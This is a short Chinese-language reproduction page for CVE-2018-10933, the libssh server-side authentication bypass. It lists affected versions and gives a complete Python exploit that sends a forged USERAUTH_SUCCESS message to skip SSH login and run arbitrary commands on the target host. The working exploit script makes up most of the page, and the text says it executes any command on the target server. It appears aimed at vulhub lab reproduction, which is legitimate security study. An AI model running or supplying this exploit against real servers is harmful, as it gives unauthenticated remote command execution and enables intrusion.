（CVE-2018-10933）Libssh_服务端权限认证绕过漏洞

# （CVE-2018-10933）Libssh 服务端权限认证绕过漏洞

=======

一、漏洞简介
————

二、漏洞影响
————

libssh的server-side state machine 0.7.6之前版本和0.8.4

三、复现过程
————

CVE-2018-10933.py
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048

def execute(hostname, port, command):
sock = socket.socket()
try:
sock.connect((hostname, int(port)))

message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()

message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)

client = transport.open_session(timeout=10)
client.exec_command(command)

# stdin = client.makefile(“wb”, bufsize)
stdout = client.makefile(“rb”, bufsize)
stderr = client.makefile_stderr(“rb”, bufsize)

output = stdout.read()
error = stderr.read()

stdout.close()
stderr.close()

return (output+error).decode()
except paramiko.SSHException as e:
logging.exception(e)
logging.debug(“TCPForwarding disabled on remote server can’t connect. Not Vulnerable”)
except socket.error:
logging.debug(“Unable to connect.”)

return None

if __name__ == ‘__main__’:
print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

使用python3执行，即可在目标服务器上执行任意命令：


参考链接
——–

> https://vulhub.org/\#/environments/libssh/CVE-2018-10933/